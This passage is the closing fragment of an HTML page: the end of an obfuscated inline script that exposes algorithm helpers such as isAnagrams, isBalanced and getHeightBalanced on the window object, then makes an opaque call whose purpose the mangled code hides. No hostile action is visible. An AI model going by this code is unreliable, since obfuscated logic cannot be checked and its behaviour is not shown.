Q4sOnFn}window[_PoKZj(0x9a)]={buildCharacterMap:MSUxhJ2,isAnagrams:j2tRUWQ,isBalanced:Q4sOnFn,getHeightBalanced:nco7OV}}return io4LB2P(_PoKZj(0x9b),{[_PoKZj(0x9c)]:FUaXU5,[_PoKZj(0x9d)]:Umd97Q})[_PoKZj(0x9e)](()=>{})}})}g3Gld7J()})();
</script>

</body>
</html>
